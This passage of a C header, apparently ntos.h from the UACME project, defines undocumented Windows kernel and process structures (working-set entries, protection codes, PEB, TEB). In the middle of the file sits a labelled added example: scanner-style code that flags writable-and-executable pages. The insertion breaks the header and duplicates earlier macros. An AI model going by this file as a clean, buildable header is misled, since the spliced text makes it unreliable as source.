} MEMORY_WORKING_SET_INFORMATION, * PMEMORY_WORKING_SET_INFORMATION;

typedef struct _MEMORY_WORKING_SET_EX_BLOCK {
    union {
        struct {
            ULONG_PTR Valid : 1;
            ULONG_PTR ShareCount : 3;
            ULONG_PTR Win32Protection : 11;
            ULONG_PTR Shared : 1;
            ULONG_PTR Node : 6;
            ULONG_PTR Locked : 1;
            ULONG_PTR LargePage : 1;
            ULONG_PTR Priority : 3;
            ULONG_PTR Reserved : 3;
            ULONG_PTR SharedOriginal : 1;
            ULONG_PTR Bad : 1;
            ULONG_PTR Win32GraphicsProtection : 4;
#ifdef _WIN64
            ULONG_PTR ReservedUlong : 28;
#endif
        };
        struct {
            ULONG_PTR Valid : 1;
            ULONG_PTR Reserved0 : 14;
            ULONG_PTR Shared : 1;
            ULONG_PTR Reserved1 : 5;
            ULONG_PTR PageTable : 1;
            ULONG_PTR Location : 2;
            ULONG_PTR Priority : 3;
            ULONG_PTR ModifiedList : 1;
            ULONG_PTR Reserved2 : 2;
            ULONG_PTR SharedOriginal : 1;
            ULONG_PTR Bad : 1;
#ifdef _WIN64
            ULONG_PTR ReservedUlong : 32;
#endif
        } Invalid;
    };
} MEMORY_WORKING_SET_EX_BLOCK, * PMEMORY_WORKING_SET_EX_BLOCK;

typedef struct _MEMORY_WORKING_SET_EX_INFORMATION {
    PVOID VirtualAddress;
    union {
        MEMORY_WORKING_SET_EX_BLOCK VirtualAttributes;
        ULONG_PTR Long;
    } u1;
} MEMORY_WORKING_SET_EX_INFORMATION, * PMEMORY_WORKING_SET_EX_INFORMATION;

#define MM_ZERO_ACCESS 0 // this value is not used.
#define MM_READONLY 1
#define MM_EXECUTE 2
#define MM_EXECUTE_READ 3
#define MM_READWRITE 4 // bit 2 is set if this is writable.
#define MM_WRITECOPY 5
#define MM_EXECUTE_READWRITE 6
#define MM_EXECUTE_WRITECOPY 7

#define MM_NOCACHE 0x8
#define MM_GUARD_PAGE 0x10
#define MM_DECOMMIT 0x10 // NO_ACCESS, Guard page
#define MM_NOACCESS 0x18 // NO_ACCESS, Guard_page, nocache.
#define MM_UNKNOWN_PROTECTION 0x100 // bigger than 5 bits!
#define MM_INVALID_PROTECTION ((ULONG)-1) // bigger than 5 bits!

#define MM_PROTECTION_WRITE_MASK 4
#define MM_PROTECTION_COPY_MASK 1
#define MM_PROTECTION_OPERATION_MASK 7 // mask off guard page and nocache.
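Added example, not part of ntos.h or the UACME project: it unpacks the 64-bit MEMORY_WORKING_SET_BLOCK layout above with shifts and masks, translates the 5-bit MM_* kernel protection into the PAGE_* value user mode sees, and walks a MEMORY_WORKING_SET_INFORMATION-shaped buffer to count pages that are writable and executable at once, which is what a memory scanner would flag. It assumes the 64-bit bit-field layout, 4 KiB pages and the winnt.h PAGE_* constants; treating nocache+guard on an accessible page as write-combine is an assumption about the kernel's own mapping, and the sample buffer is constructed.

```c
#include <stdint.h>
#include <stddef.h>

/* Win32 page protections (winnt.h values). */
#define PAGE_NOACCESS          0x001
#define PAGE_READONLY          0x002
#define PAGE_READWRITE         0x004
#define PAGE_WRITECOPY         0x008
#define PAGE_EXECUTE           0x010
#define PAGE_EXECUTE_READ      0x020
#define PAGE_EXECUTE_READWRITE 0x040
#define PAGE_EXECUTE_WRITECOPY 0x080
#define PAGE_GUARD             0x100
#define PAGE_NOCACHE           0x200
#define PAGE_WRITECOMBINE      0x400

/* Kernel 5-bit protection as in the MM_* defines above: bits 0-2 are the
 * operation (bit 2 writable, bit 1 executable, bit 0 copy), bit 3 nocache,
 * bit 4 guard page. */
#define MM_PROTECTION_OPERATION_MASK 7
#define MM_NOCACHE    0x08
#define MM_GUARD_PAGE 0x10

/* MEMORY_WORKING_SET_BLOCK, 64-bit layout, unpacked with shifts rather than
 * bit-fields: Protection:5 | ShareCount:3 | Shared:1 | Node:3 | VirtualPage:52 */
#define WS_PROTECTION(e) ((unsigned)((e) & 0x1Fu))
#define WS_SHARECOUNT(e) ((unsigned)(((e) >> 5) & 0x7u))
#define WS_SHARED(e)     ((unsigned)(((e) >> 8) & 0x1u))
#define WS_NODE(e)       ((unsigned)(((e) >> 9) & 0x7u))
#define WS_VPN(e)        ((e) >> 12)

typedef struct {
    uint64_t VirtualAddress;
    unsigned Win32Protection, ShareCount, Shared, Node;
} WS_PAGE;

/* Kernel MM_* code -> the PAGE_* value user mode sees (the mapping the
 * kernel's MmProtectToValue table encodes). Assumption: nocache+guard on an
 * accessible page is reported as write-combine, as current kernels do. */
unsigned mm_protect_to_value(unsigned mm)
{
    static const unsigned op[8] = {
        PAGE_NOACCESS, PAGE_READONLY, PAGE_EXECUTE, PAGE_EXECUTE_READ,
        PAGE_READWRITE, PAGE_WRITECOPY, PAGE_EXECUTE_READWRITE,
        PAGE_EXECUTE_WRITECOPY
    };
    unsigned base = op[mm & MM_PROTECTION_OPERATION_MASK];
    unsigned mod = mm & (MM_NOCACHE | MM_GUARD_PAGE);
    if (base == PAGE_NOACCESS)   /* 0x00, 0x08, 0x10 and MM_NOACCESS 0x18 */
        return PAGE_NOACCESS;
    if (mod == (MM_NOCACHE | MM_GUARD_PAGE))
        return base | PAGE_WRITECOMBINE;
    return base | (mod == MM_NOCACHE ? PAGE_NOCACHE : mod == MM_GUARD_PAGE ? PAGE_GUARD : 0);
}

/* Unpack one raw working-set entry (4 KiB pages). */
void ws_decode(uint64_t entry, WS_PAGE *out)
{
    out->VirtualAddress  = WS_VPN(entry) << 12;
    out->Win32Protection = mm_protect_to_value(WS_PROTECTION(entry));
    out->ShareCount = WS_SHARECOUNT(entry); out->Shared = WS_SHARED(entry); out->Node = WS_NODE(entry);
}

/* Writable and executable at once: the condition a memory scanner flags. */
int ws_is_wx(unsigned win32prot)
{
    return (win32prot & (PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY)) != 0;
}

/* Walk a MEMORY_WORKING_SET_INFORMATION-shaped buffer (word 0 is
 * NumberOfEntries), count W+X pages and report the first one's address. */
size_t ws_count_wx(const uint64_t *info, uint64_t *first_wx)
{
    size_t n = (size_t)info[0], hits = 0;
    for (size_t i = 0; i < n; i++) {
        WS_PAGE p;
        ws_decode(info[1 + i], &p);
        if (ws_is_wx(p.Win32Protection) && hits++ == 0 && first_wx)
            *first_wx = p.VirtualAddress;
    }
    return hits;
}

/* Pack an entry the way the kernel lays it out (helper for the sample). */
uint64_t ws_make_entry(uint64_t va, unsigned mm, unsigned share, unsigned shared, unsigned node)
{
    return ((va >> 12) << 12) | ((uint64_t)(node & 7) << 9) | ((uint64_t)(shared & 1) << 8)
         | ((uint64_t)(share & 7) << 5) | (mm & 0x1Fu);
}

/* Constructed sample working set: four pages, one of them RWX. */
const uint64_t *sample_working_set(void)
{
    static uint64_t info[5];
    info[0] = 4;
    info[1] = ws_make_entry(0x7FF612340000ull, 3, 2, 1, 0); /* image code: RX, shared */
    info[2] = ws_make_entry(0x1A2B3C0000ull, 4, 1, 0, 0);   /* heap: RW, private */
    info[3] = ws_make_entry(0x2C4D5E0000ull, 6, 1, 0, 0);   /* RWX private page: flagged */
    info[4] = ws_make_entry(0x30C0000ull, 0x14, 1, 0, 0);   /* stack guard page: RW|GUARD */
    return info;
}

/* Address of the first W+X page in the sample, 0 if none. */
uint64_t sample_first_wx(void)
{
    uint64_t first = 0;
    ws_count_wx(sample_working_set(), &first);
    return first;
}
```

On a live system the same decoder applies to the buffer returned by NtQueryVirtualMemory with MemoryWorkingSetInformation; the 32-bit layout (20-bit VirtualPage) needs different shift widths.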
#define MM_PROTECTION_EXECUTE_MASK 2

#define MM_SECURE_DELETE_CHECK 0x55

/*
** Virtual Memory END
*/

/*
** System Firmware START
*/
typedef enum _SYSTEM_FIRMWARE_TABLE_ACTION {
    SystemFirmwareTable_Enumerate,
    SystemFirmwareTable_Get,
    SystemFirmwareTableMax
} SYSTEM_FIRMWARE_TABLE_ACTION, *PSYSTEM_FIRMWARE_TABLE_ACTION;

typedef struct _SYSTEM_FIRMWARE_TABLE_INFORMATION {
    ULONG ProviderSignature;
    SYSTEM_FIRMWARE_TABLE_ACTION Action;
    ULONG TableID;
    ULONG TableBufferLength;
    UCHAR TableBuffer[ANYSIZE_ARRAY];
} SYSTEM_FIRMWARE_TABLE_INFORMATION, *PSYSTEM_FIRMWARE_TABLE_INFORMATION;

/*
** System Firmware END
*/

//
// PEB/TEB
//
#define GDI_HANDLE_BUFFER_SIZE32 34
#define GDI_HANDLE_BUFFER_SIZE64 60

#if !defined(_M_X64)
#define GDI_HANDLE_BUFFER_SIZE GDI_HANDLE_BUFFER_SIZE32
#else
#define GDI_HANDLE_BUFFER_SIZE GDI_HANDLE_BUFFER_SIZE64
#endif

typedef ULONG GDI_HANDLE_BUFFER32[GDI_HANDLE_BUFFER_SIZE32];
typedef ULONG GDI_HANDLE_BUFFER64[GDI_HANDLE_BUFFER_SIZE64];
typedef ULONG GDI_HANDLE_BUFFER[GDI_HANDLE_BUFFER_SIZE];

#define RTL_MAX_DRIVE_LETTERS 32
#define RTL_DRIVE_LETTER_VALID (USHORT)0x0001

// 32-bit definitions
typedef struct _STRING32 {
    USHORT Length;
    USHORT MaximumLength;
    ULONG Buffer;
} STRING32;
typedef STRING32 *PSTRING32;

typedef STRING32 UNICODE_STRING32;

#if (_MSC_VER < 1300) && !defined(_WINDOWS_)
typedef struct LIST_ENTRY32 {
    DWORD Flink;
    DWORD Blink;
} LIST_ENTRY32;
typedef LIST_ENTRY32 *PLIST_ENTRY32;

typedef struct LIST_ENTRY64 {
    ULONGLONG Flink;
    ULONGLONG Blink;
} LIST_ENTRY64;
typedef LIST_ENTRY64 *PLIST_ENTRY64;
#endif

#define WOW64_POINTER(Type) ULONG

typedef struct _PEB_LDR_DATA32 {
    ULONG Length;
    BOOLEAN Initialized;
    WOW64_POINTER(HANDLE) SsHandle;
    LIST_ENTRY32 InLoadOrderModuleList;
    LIST_ENTRY32 InMemoryOrderModuleList;
    LIST_ENTRY32 InInitializationOrderModuleList;
    WOW64_POINTER(PVOID) EntryInProgress;
    BOOLEAN ShutdownInProgress;
    WOW64_POINTER(HANDLE) ShutdownThreadId;
} PEB_LDR_DATA32, *PPEB_LDR_DATA32;

#define LDR_DATA_TABLE_ENTRY_SIZE_WINXP32 FIELD_OFFSET( LDR_DATA_TABLE_ENTRY32, ForwarderLinks )

typedef struct _LDR_DATA_TABLE_ENTRY32 {
    LIST_ENTRY32 InLoadOrderLinks;
    LIST_ENTRY32 InMemoryOrderLinks;
    LIST_ENTRY32 InInitializationOrderLinks;
    WOW64_POINTER(PVOID) DllBase;
    WOW64_POINTER(PVOID) EntryPoint;
    ULONG SizeOfImage;
    UNICODE_STRING32 FullDllName;
    UNICODE_STRING32 BaseDllName;
    ULONG Flags;
    USHORT LoadCount;
    USHORT TlsIndex;
    union {
        LIST_ENTRY32 HashLinks;
        struct {
            WOW64_POINTER(PVOID) SectionPointer;
            ULONG CheckSum;
        };
    };
    union {
        ULONG TimeDateStamp;
        WOW64_POINTER(PVOID) LoadedImports;
    };
    WOW64_POINTER(PVOID) EntryPointActivationContext;
    WOW64_POINTER(PVOID) PatchInformation;
    LIST_ENTRY32 ForwarderLinks;
    LIST_ENTRY32 ServiceTagLinks;
    LIST_ENTRY32 StaticLinks;
    WOW64_POINTER(PVOID) ContextInformation;
    WOW64_POINTER(ULONG_PTR) OriginalBase;
    LARGE_INTEGER LoadTime;
} LDR_DATA_TABLE_ENTRY32, *PLDR_DATA_TABLE_ENTRY32;

typedef struct _CURDIR32 {
    UNICODE_STRING32 DosPath;
    WOW64_POINTER(HANDLE) Handle;
} CURDIR32, *PCURDIR32;

typedef struct _RTL_DRIVE_LETTER_CURDIR32 {
    USHORT Flags;
    USHORT Length;
    ULONG TimeStamp;
    STRING32 DosPath;
} RTL_DRIVE_LETTER_CURDIR32, *PRTL_DRIVE_LETTER_CURDIR32;

typedef struct _RTL_USER_PROCESS_PARAMETERS32 {
    ULONG MaximumLength;
    ULONG Length;
    ULONG Flags;
    ULONG DebugFlags;
    WOW64_POINTER(HANDLE) ConsoleHandle;
    ULONG ConsoleFlags;
    WOW64_POINTER(HANDLE) StandardInput;
    WOW64_POINTER(HANDLE) StandardOutput;
    WOW64_POINTER(HANDLE) StandardError;
    CURDIR32 CurrentDirectory;
    UNICODE_STRING32 DllPath;
    UNICODE_STRING32 ImagePathName;
    UNICODE_STRING32 CommandLine;
    WOW64_POINTER(PVOID) Environment;
    ULONG StartingX;
    ULONG StartingY;
    ULONG CountX;
    ULONG CountY;
    ULONG CountCharsX;
    ULONG CountCharsY;
    ULONG FillAttribute;
    ULONG WindowFlags;
    ULONG ShowWindowFlags;
    UNICODE_STRING32 WindowTitle;
    UNICODE_STRING32 DesktopInfo;
    UNICODE_STRING32 ShellInfo;
    UNICODE_STRING32 RuntimeData;
    RTL_DRIVE_LETTER_CURDIR32 CurrentDirectories[RTL_MAX_DRIVE_LETTERS];
    ULONG EnvironmentSize;
    ULONG EnvironmentVersion;
} RTL_USER_PROCESS_PARAMETERS32, *PRTL_USER_PROCESS_PARAMETERS32;

typedef struct _PEB32 {
    BOOLEAN InheritedAddressSpace;
    BOOLEAN ReadImageFileExecOptions;
    BOOLEAN BeingDebugged;
    union {
        BOOLEAN BitField;
        struct {
            BOOLEAN ImageUsesLargePages : 1;
            BOOLEAN IsProtectedProcess : 1;
            BOOLEAN IsLegacyProcess : 1;
            BOOLEAN IsImageDynamicallyRelocated : 1;
            BOOLEAN SkipPatchingUser32Forwarders : 1;
            BOOLEAN SpareBits : 3;
        };
    };
    WOW64_POINTER(HANDLE) Mutant;
    WOW64_POINTER(PVOID) ImageBaseAddress;
    WOW64_POINTER(PPEB_LDR_DATA) Ldr;
    WOW64_POINTER(PRTL_USER_PROCESS_PARAMETERS) ProcessParameters;
    WOW64_POINTER(PVOID) SubSystemData;
    WOW64_POINTER(PVOID) ProcessHeap;
    WOW64_POINTER(PRTL_CRITICAL_SECTION) FastPebLock;
    WOW64_POINTER(PVOID) AtlThunkSListPtr;
    WOW64_POINTER(PVOID) IFEOKey;
    union {
        ULONG CrossProcessFlags;
        struct {
            ULONG ProcessInJob : 1;
            ULONG ProcessInitializing : 1;
            ULONG ProcessUsingVEH : 1;
            ULONG ProcessUsingVCH : 1;
            ULONG ProcessUsingFTH : 1;
            ULONG ProcessPreviouslyThrottled : 1;
            ULONG ProcessCurrentlyThrottled : 1;
            ULONG ReservedBits0 : 25;
        };
        ULONG EnvironmentUpdateCount;
    };
    union {
        WOW64_POINTER(PVOID) KernelCallbackTable;
        WOW64_POINTER(PVOID) UserSharedInfoPtr;
    };
    ULONG SystemReserved[1];
    ULONG AtlThunkSListPtr32;
    WOW64_POINTER(PVOID) ApiSetMap;
    ULONG TlsExpansionCounter;
    WOW64_POINTER(PVOID) TlsBitmap;
    ULONG TlsBitmapBits[2];
    WOW64_POINTER(PVOID) ReadOnlySharedMemoryBase;
    WOW64_POINTER(PVOID) HotpatchInformation;
    WOW64_POINTER(PPVOID) ReadOnlyStaticServerData;
    WOW64_POINTER(PVOID) AnsiCodePageData;
    WOW64_POINTER(PVOID) OemCodePageData;
    WOW64_POINTER(PVOID) UnicodeCaseTableData;
    ULONG NumberOfProcessors;
    ULONG NtGlobalFlag;
    LARGE_INTEGER CriticalSectionTimeout;
    WOW64_POINTER(SIZE_T) HeapSegmentReserve;
    WOW64_POINTER(SIZE_T) HeapSegmentCommit;
    WOW64_POINTER(SIZE_T) HeapDeCommitTotalFreeThreshold;
    WOW64_POINTER(SIZE_T) HeapDeCommitFreeBlockThreshold;
    ULONG NumberOfHeaps;
    ULONG MaximumNumberOfHeaps;
    WOW64_POINTER(PPVOID) ProcessHeaps;
    WOW64_POINTER(PVOID) GdiSharedHandleTable;
    WOW64_POINTER(PVOID) ProcessStarterHelper;
    ULONG GdiDCAttributeList;
    WOW64_POINTER(PRTL_CRITICAL_SECTION) LoaderLock;
    ULONG OSMajorVersion;
    ULONG OSMinorVersion;
    USHORT OSBuildNumber;
    USHORT OSCSDVersion;
    ULONG OSPlatformId;
    ULONG ImageSubsystem;
    ULONG ImageSubsystemMajorVersion;
    ULONG ImageSubsystemMinorVersion;
    WOW64_POINTER(ULONG_PTR) ImageProcessAffinityMask;
    GDI_HANDLE_BUFFER32 GdiHandleBuffer;
    WOW64_POINTER(PVOID) PostProcessInitRoutine;
    WOW64_POINTER(PVOID) TlsExpansionBitmap;
    ULONG TlsExpansionBitmapBits[32];
    ULONG SessionId;
    // Rest of structure not included.
} PEB32, *PPEB32;

#define GDI_BATCH_BUFFER_SIZE 310

typedef struct _GDI_TEB_BATCH32 {
    ULONG Offset;
    WOW64_POINTER(ULONG_PTR) HDC;
    ULONG Buffer[GDI_BATCH_BUFFER_SIZE];
} GDI_TEB_BATCH32, *PGDI_TEB_BATCH32;

#if (_MSC_VER < 1300) && !defined(_WINDOWS_)
//
// 32 and 64 bit specific version for wow64 and the debugger
//
typedef struct _NT_TIB32 {
    DWORD ExceptionList;
    DWORD StackBase;
    DWORD StackLimit;
    DWORD SubSystemTib;
    union {
        DWORD FiberData;
        DWORD Version;
    };
    DWORD ArbitraryUserPointer;
    DWORD Self;
} NT_TIB32, *PNT_TIB32;

typedef struct _NT_TIB64 {
    DWORD64 ExceptionList;
    DWORD64 StackBase;
    DWORD64 StackLimit;
    DWORD64 SubSystemTib;
    union {
        DWORD64 FiberData;
        DWORD Version;
    };
    DWORD64 ArbitraryUserPointer;
    DWORD64 Self;
} NT_TIB64, *PNT_TIB64;
#endif

typedef struct _TEB32 {
    NT_TIB32 NtTib;
    WOW64_POINTER(PVOID) EnvironmentPointer;
    CLIENT_ID32 ClientId;
    WOW64_POINTER(PVOID) ActiveRpcHandle;
    WOW64_POINTER(PVOID) ThreadLocalStoragePointer;
    WOW64_POINTER(PPEB) ProcessEnvironmentBlock;
    ULONG LastErrorValue;
    ULONG CountOfOwnedCriticalSections;
    WOW64_POINTER(PVOID) CsrClientThread;
    WOW64_POINTER(PVOID) Win32ThreadInfo;
    ULONG User32Reserved[26];
    ULONG UserReserved[5];
    WOW64_POINTER(PVOID) WOW32Reserved;
    LCID CurrentLocale;
    ULONG FpSoftwareStatusRegister;
    WOW64_POINTER(PVOID) SystemReserved1[54];
    NTSTATUS ExceptionCode;
    WOW64_POINTER(PVOID) ActivationContextStackPointer;
    BYTE SpareBytes[36];
    ULONG TxFsContext;
    GDI_TEB_BATCH32 GdiTebBatch;
    CLIENT_ID32 RealClientId;
    WOW64_POINTER(HANDLE) GdiCachedProcessHandle;
    ULONG GdiClientPID;
    ULONG GdiClientTID;
    WOW64_POINTER(PVOID) GdiThreadLocalInfo;
    WOW64_POINTER(ULONG_PTR) Win32ClientInfo[62];
    WOW64_POINTER(PVOID) glDispatchTable[233];
    WOW64_POINTER(ULONG_PTR) glReserved1[29];
    WOW64_POINTER(PVOID) glReserved2;
    WOW64_POINTER(PVOID) glSectionInfo;
    WOW64_POINTER(PVOID) glSection;
    WOW64_POINTER(PVOID) glTable;
    WOW64_POINTER(PVOID) glCurrentRC;
    WOW64_POINTER(PVOID) glContext;
    NTSTATUS LastStatusValue;
    UNICODE_STRING32 StaticUnicodeString;
    WCHAR StaticUnicodeBuffer[261];
    WOW64_POINTER(PVOID) DeallocationStack;
    WOW64_POINTER(PVOID) TlsSlots[64];
    LIST_ENTRY32 TlsLinks;
} TEB32, *PTEB32;

typedef struct _PEB_LDR_DATA {
    ULONG Length;
    BOOLEAN Initialized;
    HANDLE SsHandle;
    LIST_ENTRY InLoadOrderModuleList;
    LIST_ENTRY InMemoryOrderModuleList;
    LIST_ENTRY InInitializationOrderModuleList;
    PVOID EntryInProgress;
    BOOLEAN ShutdownInProgress;
    HANDLE ShutdownThreadId;
} PEB_LDR_DATA, *PPEB_LDR_DATA;

#ifndef FLS_MAXIMUM_AVAILABLE
#define FLS_MAXIMUM_AVAILABLE 128
#endif

#ifndef TLS_MINIMUM_AVAILABLE
#define TLS_MINIMUM_AVAILABLE 64
#endif

#ifndef TLS_EXPANSION_SLOTS
#define TLS_EXPANSION_SLOTS 1024
#endif

#ifndef DOS_MAX_COMPONENT_LENGTH
#define DOS_MAX_COMPONENT_LENGTH 255
#endif

#ifndef DOS_MAX_PATH_LENGTH
#define DOS_MAX_PATH_LENGTH (DOS_MAX_COMPONENT_LENGTH + 5)
#endif

typedef struct _ACTIVATION_CONTEXT_DATA * PACTIVATION_CONTEXT_DATA;
typedef struct _ASSEMBLY_STORAGE_MAP * PASSEMBLY_STORAGE_MAP;

typedef struct _CURDIR {
    UNICODE_STRING DosPath;
    HANDLE Handle;
} CURDIR, *PCURDIR;

#define RTL_USER_PROC_CURDIR_CLOSE 0x00000002
#define RTL_USER_PROC_CURDIR_INHERIT 0x00000003

typedef struct _RTL_DRIVE_LETTER_CURDIR {
    USHORT Flags;
    USHORT Length;
    ULONG TimeStamp;
    STRING DosPath;
} RTL_DRIVE_LETTER_CURDIR, *PRTL_DRIVE_LETTER_CURDIR;

typedef struct _RTL_USER_PROCESS_PARAMETERS {
    ULONG MaximumLength;
    ULONG Length;
    ULONG Flags;
    ULONG DebugFlags;
    HANDLE ConsoleHandle;
    ULONG ConsoleFlags;
    HANDLE StandardInput;
    HANDLE StandardOutput;
    HANDLE StandardError;
    CURDIR CurrentDirectory;
    UNICODE_STRING DllPath;
    UNICODE_STRING ImagePathName;
    UNICODE_STRING CommandLine;
    PVOID Environment;
    ULONG StartingX;
    ULONG StartingY;
    ULONG CountX;
    ULONG CountY;
    ULONG CountCharsX;
    ULONG CountCharsY;
    ULONG FillAttribute;
    ULONG WindowFlags;
    ULONG ShowWindowFlags;
    UNICODE_STRING WindowTitle;
    UNICODE_STRING DesktopInfo;
    UNICODE_STRING ShellInfo;
    UNICODE_STRING RuntimeData;
    RTL_DRIVE_LETTER_CURDIR CurrentDirectories[RTL_MAX_DRIVE_LETTERS];
    ULONG_PTR EnvironmentSize;
    ULONG_PTR EnvironmentVersion;
    PVOID PackageDependencyData;
    ULONG ProcessGroupId;
    ULONG LoaderThreads;
    UNICODE_STRING RedirectionDllName; // RS4
    UNICODE_STRING HeapPartitionName; // 19H1
    ULONG_PTR DefaultThreadpoolCpuSetMasks;
    ULONG DefaultThreadpoolCpuSetMaskCount;
    ULONG DefaultThreadpoolThreadMaximum;
    ULONG HeapMemoryTypeMask; // WIN11
} RTL_USER_PROCESS_PARAMETERS, * PRTL_USER_PROCESS_PARAMETERS;

#define FLG_STOP_ON_EXCEPTION 0x00000001
#define FLG_SHOW_LDR_SNAPS 0x00000002
#define FLG_DEBUG_INITIAL_COMMAND 0x00000004
#define FLG_STOP_ON_HUNG_GUI 0x00000008
#define FLG_HEAP_ENABLE_TAIL_CHECK 0x00000010
#define FLG_HEAP_ENABLE_FREE_CHECK 0x00000020
#define FLG_HEAP_VALIDATE_PARAMETERS 0x00000040
#define FLG_HEAP_VALIDATE_ALL 0x00000080
#define FLG_APPLICATION_VERIFIER 0x00000100
#define FLG_MONITOR_SILENT_PROCESS_EXIT 0x00000200
#define FLG_POOL_ENABLE_TAGGING 0x00000400
#define FLG_HEAP_ENABLE_TAGGING 0x00000800
#define FLG_USER_STACK_TRACE_DB 0x00001000
#define FLG_KERNEL_STACK_TRACE_DB 0x00002000
#define FLG_MAINTAIN_OBJECT_TYPELIST 0x00004000
#define FLG_HEAP_ENABLE_TAG_BY_DLL 0x00008000
#define FLG_DISABLE_STACK_EXTENSION 0x00010000
#define FLG_ENABLE_CSRDEBUG 0x00020000
#define FLG_ENABLE_KDEBUG_SYMBOL_LOAD 0x00040000
#define FLG_DISABLE_PAGE_KERNEL_STACKS 0x00080000
#define FLG_ENABLE_SYSTEM_CRIT_BREAKS 0x00100000
#define FLG_HEAP_DISABLE_COALESCING 0x00200000
#define FLG_ENABLE_CLOSE_EXCEPTIONS 0x00400000
#define FLG_ENABLE_EXCEPTION_LOGGING 0x00800000
#define FLG_ENABLE_HANDLE_TYPE_TAGGING 0x01000000
#define FLG_HEAP_PAGE_ALLOCS 0x02000000
#define FLG_DEBUG_INITIAL_COMMAND_EX 0x04000000
#define FLG_DISABLE_DBGPRINT 0x08000000
#define FLG_CRITSEC_EVENT_CREATION 0x10000000
#define FLG_LDR_TOP_DOWN 0x20000000
#define FLG_ENABLE_HANDLE_EXCEPTIONS 0x40000000
#define FLG_DISABLE_PROTDLLS 0x80000000

typedef struct _PEB {
    BOOLEAN InheritedAddressSpace;
    BOOLEAN ReadImageFileExecOptions;
    BOOLEAN BeingDebugged;
    union {
        BOOLEAN BitField;
        struct {
            BOOLEAN ImageUsesLargePages : 1;
            BOOLEAN IsProtectedProcess : 1;
            BOOLEAN IsImageDynamicallyRelocated : 1;
            BOOLEAN SkipPatchingUser32Forwarders : 1;
            BOOLEAN IsPackagedProcess : 1;
            BOOLEAN IsAppContainer : 1;
            BOOLEAN IsProtectedProcessLight : 1;
            BOOLEAN IsLongPathAwareProcess : 1;
        };
    };
    HANDLE Mutant;
    PVOID ImageBaseAddress;
    PPEB_LDR_DATA Ldr;
    PRTL_USER_PROCESS_PARAMETERS ProcessParameters;
    PVOID SubSystemData;
    PVOID ProcessHeap;
    PRTL_CRITICAL_SECTION FastPebLock;
    PSLIST_HEADER AtlThunkSListPtr;
    PVOID IFEOKey;
    union {
        ULONG CrossProcessFlags;
        struct {
            ULONG ProcessInJob : 1;
            ULONG ProcessInitializing : 1;
            ULONG ProcessUsingVEH : 1;
            ULONG ProcessUsingVCH : 1;
            ULONG ProcessUsingFTH : 1;
            ULONG ProcessPreviouslyThrottled : 1;
            ULONG ProcessCurrentlyThrottled : 1;
            ULONG ProcessImagesHotPatched : 1; // RS5
            ULONG ReservedBits0 : 24;
        };
    };
    union {
        PVOID KernelCallbackTable;
        PVOID UserSharedInfoPtr;
    };
    ULONG SystemReserved;
    ULONG AtlThunkSListPtr32;
    PVOID ApiSetMap;
    ULONG TlsExpansionCounter;
    PVOID TlsBitmap;
    ULONG TlsBitmapBits[2];
    PVOID ReadOnlySharedMemoryBase;
    struct _SILO_USER_SHARED_DATA* SharedData;
    PVOID* ReadOnlyStaticServerData;
    PVOID AnsiCodePageData;
    PVOID OemCodePageData;
    PVOID UnicodeCaseTableData;
    ULONG NumberOfProcessors;
    union {
        ULONG NtGlobalFlag;
        struct {
            ULONG StopOnException : 1; // FLG_STOP_ON_EXCEPTION
            ULONG ShowLoaderSnaps : 1; // FLG_SHOW_LDR_SNAPS
            ULONG DebugInitialCommand : 1; // FLG_DEBUG_INITIAL_COMMAND
            ULONG StopOnHungGUI : 1; // FLG_STOP_ON_HUNG_GUI
            ULONG HeapEnableTailCheck : 1; // FLG_HEAP_ENABLE_TAIL_CHECK
            ULONG HeapEnableFreeCheck : 1; // FLG_HEAP_ENABLE_FREE_CHECK
            ULONG HeapValidateParameters : 1; // FLG_HEAP_VALIDATE_PARAMETERS
            ULONG HeapValidateAll : 1; // FLG_HEAP_VALIDATE_ALL
            ULONG ApplicationVerifier : 1; // FLG_APPLICATION_VERIFIER
            ULONG MonitorSilentProcessExit : 1; // FLG_MONITOR_SILENT_PROCESS_EXIT
            ULONG PoolEnableTagging : 1; // FLG_POOL_ENABLE_TAGGING
            ULONG HeapEnableTagging : 1; // FLG_HEAP_ENABLE_TAGGING
            ULONG UserStackTraceDb : 1; // FLG_USER_STACK_TRACE_DB
            ULONG KernelStackTraceDb : 1; // FLG_KERNEL_STACK_TRACE_DB
            ULONG MaintainObjectTypeList : 1; // FLG_MAINTAIN_OBJECT_TYPELIST
            ULONG HeapEnableTagByDll : 1; // FLG_HEAP_ENABLE_TAG_BY_DLL
            ULONG DisableStackExtension : 1; // FLG_DISABLE_STACK_EXTENSION
            ULONG EnableCsrDebug : 1; // FLG_ENABLE_CSRDEBUG
            ULONG EnableKDebugSymbolLoad : 1; // FLG_ENABLE_KDEBUG_SYMBOL_LOAD
            ULONG DisablePageKernelStacks : 1; // FLG_DISABLE_PAGE_KERNEL_STACKS
            ULONG EnableSystemCritBreaks : 1; // FLG_ENABLE_SYSTEM_CRIT_BREAKS
            ULONG HeapDisableCoalescing : 1; // FLG_HEAP_DISABLE_COALESCING
            ULONG EnableCloseExceptions : 1; // FLG_ENABLE_CLOSE_EXCEPTIONS
            ULONG EnableExceptionLogging : 1; // FLG_ENABLE_EXCEPTION_LOGGING
            ULONG EnableHandleTypeTagging : 1; // FLG_ENABLE_HANDLE_TYPE_TAGGING
            ULONG HeapPageAllocs : 1; // FLG_HEAP_PAGE_ALLOCS
            ULONG DebugInitialCommandEx : 1; // FLG_DEBUG_INITIAL_COMMAND_EX
            ULONG DisableDbgPrint : 1; // FLG_DISABLE_DBGPRINT
            ULONG CritSecEventCreation : 1; // FLG_CRITSEC_EVENT_CREATION
            ULONG LdrTopDown : 1; // FLG_LDR_TOP_DOWN
            ULONG EnableHandleExceptions : 1; // FLG_ENABLE_HANDLE_EXCEPTIONS
            ULONG DisableProtDlls : 1; // FLG_DISABLE_PROTDLLS
        } NtGlobalFlags;
    };
    ULARGE_INTEGER CriticalSectionTimeout;
    SIZE_T HeapSegmentReserve;
    SIZE_T HeapSegmentCommit;
    SIZE_T HeapDeCommitTotalFreeThreshold;
    SIZE_T HeapDeCommitFreeBlockThreshold;
    ULONG NumberOfHeaps;
    ULONG MaximumNumberOfHeaps;
    PVOID* ProcessHeaps;
    PVOID GdiSharedHandleTable;
    PVOID ProcessStarterHelper;
    ULONG GdiDCAttributeList;
    PRTL_CRITICAL_SECTION LoaderLock;
    ULONG OSMajorVersion;
    ULONG OSMinorVersion;
    USHORT OSBuildNumber;
    USHORT OSCSDVersion;
    ULONG OSPlatformId;
    ULONG ImageSubsystem;
    ULONG ImageSubsystemMajorVersion;
